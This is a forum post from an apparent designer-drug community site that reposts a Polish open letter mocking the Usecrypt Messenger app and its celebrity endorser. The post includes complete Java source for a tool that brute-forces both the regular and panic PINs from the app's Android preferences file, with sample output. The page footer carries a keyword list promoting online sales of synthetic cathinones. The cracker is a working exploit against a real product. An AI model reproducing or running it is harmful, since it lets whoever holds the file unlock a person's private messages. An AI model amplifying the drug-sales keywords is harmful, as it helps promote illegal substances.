Jump to content

Welcome to Dopalamy.com!

You are currently viewing the forum as a guest, you do not have access to the full forum manual and a lot of material that can only be viewed by the registered new forum. Create an account and use a powerful knowledge source! By registering an account, you have a no-logs policy. We do not store private user data.

See what you gain by staying on our forum:

 • The ability to send private messages to other users
 • Participate in the full RC chat news
 • Access to partner subforum, contests, free samples

Don't wait, Sign Up today!

Sign in to follow this  
NoMercy

Usecrypr Messenger Papryk Vegeta xD

Recommended Posts

"/*

List otwarty do Patryka Vegi

Drogi Patryku. Ustalmy na wstepie - jestes rezyserem i znasz sie na branzy filmowej. Nie znasz sie
na komputerach, sieciach ani tym bardziej kryptografii. Reklamujesz Usecrypt Messengera i niestety
twoi nowi koledzy robia z Ciebie debila.

Mowisz, ze fachowcy z Mossadu zabrali telefon z Usecryptem i nie odzywali sie przez dwa miesiace. Wiesz
czemu? Bo przez bite dwa miesiace nie mogli przestac sie smiac. Zlamanie zabezpieczen Usecrypt Messengera
to nie zadanie dla Mossadu tylko dla mnie, studenta drugiego roku informatyki.

Patryku, nie mam dla ciebie dobrych wiadomosci. Jesli zlosliwe oprogramowanie odczyta plik
/data/data/uc.messenger/shared_prefs/SecureSMS-Preferences.xml z twojego telefonu z Androidem, a to naprawde
latwe gdy jest sie zlosliwym oprogramowaniem, to oba PIN-y (ten zwykly i ten paniczny) stoja otworem.

Wiem, ze ciezko bedzie Ci w to uwierzyc, wiec zalaczam program za pomoca ktorego mozna zlamac zabezpieczenia
Usecrypt Messengera. Potrzebuje on do dzialania pliku SecureSMS-Preferences.xml z prywatnego katalogu Usecrypt
Messengera. Uruchamiasz program z nazwa tego pliku jako parametrem, czekasz krotka chwile i dostajesz na
ekranie najpierw Panic PIN a potem PIN.

Serdecznie Cie pozdrawiam
Student II roku (nie napisze, ktorej uczelni)

PS: nie reklamuj wiecej komunikatorow, OK?


----

Do uruchomienia niniejszego programu potrzebujesz bibliotek

Google_Protocol_Buffers_support_0.5.9
axolotl-java-1.4.2
protobuf-java-2.5.0
curve25519-java-0.2.4
org.bouncycastle:bcprov-ext-jdk14:1.51

----
Przykladowe uruchomienie:

Usecrypt Messenger mega [email protected] double PIN cracker
Looking for PANIC PIN, max: 9999
checking 3333
PANIC PIN found: 3333
Looking for PIN, max: 9999
checking 1111
PIN found: 1111


*/

import org.bouncycastle.jce.provider.BouncyCastleProvider;
import org.bouncycastle.util.encoders.Base64;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import org.whispersystems.libaxolotl.IdentityKey;
import org.whispersystems.libaxolotl.InvalidKeyException;
import javax.crypto.Mac;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.SecretKeySpec;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import java.io.File;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.Security;
import java.util.Arrays;

public class UsecryptMessengerCracker {

  final int max_pin = 9999;

  int xml_passphrase_iterations= 20000;
  String xml_master_secret=null;
  String xml_pref_identity_public_v3=null;
  String xml_panic_hash=null;
  String xml_mac_salt=null;

  public static void main(String[] args) {
    UsecryptMessengerCracker d = new UsecryptMessengerCracker();
    d.crackUsecryptMessenger(args);
  }

  public void crackUsecryptMessenger(String[] args) {
    Security.addProvider(new BouncyCastleProvider());

    System.out.println("Usecrypt Messenger mega [email protected] double PIN cracker");

    if (args.length != 1){
      System.out.println("You need to provide a Usecrypt Messenger XML file from Android phone as a parameter");
      System.out.println("This is the one you need: /data/data/uc.messenger/shared_prefs/SecureSMS-Preferences.xml");
      System.exit(-1);
    }

    if (!new File(args[0]).exists()){
      System.out.println("File does not exist: "+args[0]);
      System.exit(-2);
    }

    DocumentBuilderFactory dbFactory = DocumentBuilderFactory.newInstance();
    try {
      DocumentBuilder dBuilder = dbFactory.newDocumentBuilder();
      Document doc = dBuilder.parse(new File(args[0]));


      Element map = doc.getDocumentElement();
      for (int i = 0; i < map.getChildNodes().getLength(); i++){
        Node n = map.getChildNodes().item(i);

        String name = n.getNodeName();
        if (name.equals("string") && n.hasAttributes() ){
          Node attrib = n.getAttributes().item(0);
          if (attrib.getNodeValue().equals("master_secret")){
            xml_master_secret = n.getTextContent();
          }
          if (attrib.getNodeValue().equals("pref_identity_public_v3")){
            xml_pref_identity_public_v3 = n.getTextContent();
          }
          if (attrib.getNodeValue().equals("panic_hash")){
            xml_panic_hash = n.getTextContent();
          }
          if (attrib.getNodeValue().equals("mac_salt")){
            xml_mac_salt = n.getTextContent();
          }
        }

        if (name.equals("int") && n.hasAttributes() ){
          Node attrib = n.getAttributes().item(0);
          if (attrib.getNodeValue().equals("passphrase_iterations")){
            String v = n.getAttributes().item(1).getTextContent();
            xml_passphrase_iterations = Integer.parseInt(v);
          }
        }
      }
    } catch (Exception e) {
      System.out.println("Error parsing XML: "+e.toString());
      System.exit(-3);
    }

    if (xml_master_secret==null || xml_pref_identity_public_v3==null || xml_panic_hash==null || xml_mac_salt==null){
      System.out.println("XML does not contain all required fields: ");
      System.exit(-4);
    }

    byte[] panic_hash_decoded = Base64.decode(xml_panic_hash);


    String ret = findPanicPIN(max_pin, panic_hash_decoded, xml_pref_identity_public_v3);
    if (ret != null){
      System.out.println("PANIC PIN found: "+ret);
    }else{
      System.out.println("PANIC PIN not found");
    }

    ret = findMasterSecret(max_pin, xml_master_secret, xml_mac_salt);
    if (ret != null){
      System.out.println("PIN found: "+ret);
    }else{
      System.out.println("PIN not found");
    }
  }


  public String findPanicPIN(int max, byte[] panic_hash_decoded, String pref_identity_public_v3) {
    System.out.println("Looking for PANIC PIN, max: "+max);

    for (int i=0; i<max+1; i++){
      String s = String.valueOf(i);
      System.out.print("checking ");
      System.out.print(s);
      System.out.print("\r");
      if(validatePanicPIN(s, panic_hash_decoded, pref_identity_public_v3)){
        System.out.println("");
        return s;
      }
    }

    System.out.println("");

    return null;

  }

  public boolean validatePanicPIN(String pin, byte[] panic_hash_decoded, String pref_identity_public_v3) {

    byte[] b2 = new byte[0];
    try {
      b2 = getHashFromPassphrase(new IdentityKey(Base64.decode(pref_identity_public_v3), 0).serialize(), pin);
    } catch (InvalidKeyException e) {
      e.printStackTrace();
    }

    if (Arrays.equals(panic_hash_decoded,b2)) {
      return true;
    }else{
      return false;
    }
  }


  private static byte[] getHashFromPassphrase(byte[] var0, String var1) {
    byte[] var3 = var1.getBytes();
    byte[] var2 = new byte[var3.length + var0.length];
    System.arraycopy(var3, 0, var2, 0, var3.length);
    System.arraycopy(var0, 0, var2, var3.length, var0.length);
    byte[] var01 = var2;
    try {
      MessageDigest var11 = MessageDigest.getInstance("SHA-256");
      var11.update(var01);
      var01 = var11.digest();
    } catch (NoSuchAlgorithmException var21) {
      var01 = null;
    }

    return var01;
  }

  public String findMasterSecret(int max, String master_secret, String mac_salt) {
    System.out.println("Looking for PIN, max: "+max);

    byte[] master_secret_decoded = Base64.decode(master_secret);
    byte[] mac_salt_decoded = Base64.decode(mac_salt);

    for (int i=0; i<max+1; i++){
      String candidatePass = String.valueOf(i); // in case of alphanum passwords, try different candidates values here
      System.out.print("checking ");
      System.out.print(candidatePass);
      System.out.print("\r");
      if(true == verifyMasterPIN(candidatePass, master_secret_decoded, mac_salt_decoded, xml_passphrase_iterations)){
        System.out.println("");
        return candidatePass;
      }
    }
    System.out.println("");
    return null;
  }


  public boolean verifyMasterPIN(String pin, byte[] master_secret_decoded, byte[] mac_salt_decoded, int passphrase_iterations) {

    try {
      int var4 = passphrase_iterations;
      byte[] var0 = mac_salt_decoded;
      PBEKeySpec var32 = new PBEKeySpec(pin.toCharArray(), var0, var4);
      SecretKeySpec var41 = new SecretKeySpec(SecretKeyFactory.getInstance("PBEWITHSHA1AND128BITAES-CBC-BC").generateSecret(var32).getEncoded(), "HmacSHA1");
      Mac var31 = Mac.getInstance("HmacSHA1");
      var31.init(var41);
      Mac var411 = var31;
      var0 = new byte[master_secret_decoded.length - var411.getMacLength()];
      System.arraycopy(master_secret_decoded, 0, var0, 0, var0.length);
      byte[] var5 = new byte[var411.getMacLength()];
      System.arraycopy(master_secret_decoded, master_secret_decoded.length - var411.getMacLength(), var5, 0, var5.length);
      if (Arrays.equals(var5, var411.doFinal(var0))) {
        return true;
      } else {
        return false;
      }
    } catch (Exception e) {
      //System.out.println(e.toString());
      return false;
    }

  }


}" 

 

PasteBin.pl

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

 • Recently Browsing   0 members

  No registered users viewing this page.

Tags

Dopalamy.com


dopalacze sklepy, opinie o sklepach z dopalaczami, sklepy z dopalaczami, dopalacze sklepy internetowe, dopalacze sklep internetowy, dopalacze sklep, gdzie kupić dopalacze, research chemicals, research chemicals shop, research chemicals opinions, research chemicals reviews, buy research chemicals, buy research chemicals online, kopen research chemicals, winkel research chemicals, Meningen research chemicals, beoordelingen research chemicals, kaufen research chemicals, Geschäft research chemicals, Meinungen research chemicals, Bewertungen research chemicals, comprar research chemicals, tienda research chemicals, comentarios research chemicals, opiniones research chemicals, 3-CMC, 4-CMC, 4-CEC, 3-CEC, 4-MMC, 4-EMC, 4-MEC, 3-MMC, 3-MEC, alfa-PVP, alpha-PVP, α-PVP, HEX-EN, NEH, MDPHP, HEP, NEP, MDPEP, alfa-pihp, alpha-pihp, alfa-php, alpha-php, a-PVT, pentedron,

Main

helpful links


Chatbox Clubs Calendar Ranking

Important Links

Most Important Links


News Chat unban Rank Advertisement Hall of Fame

Staff Team

List With Staff Members


×
×
 • Create New...